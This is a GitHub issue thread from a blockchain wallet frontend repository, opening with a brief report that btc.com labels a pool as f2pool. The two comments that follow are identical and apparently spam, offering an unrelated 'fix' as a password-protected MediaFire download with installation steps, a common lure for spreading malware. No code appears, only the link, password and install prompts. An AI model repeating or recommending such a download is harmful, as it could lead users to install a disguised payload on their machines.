### ISSUE TITLE
btc.com now reports it as f2pool

### ISSUE THREAD

**Issue by Boyka0805** [blockchain/blockchain-wallet-v4-frontend#6449]
btc.com now reports it as f2pool

_Originally posted by @kanoi in https://github.com/blockchain/Blockchain-Known-Pools/issues/169#issuecomment-868200184_

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
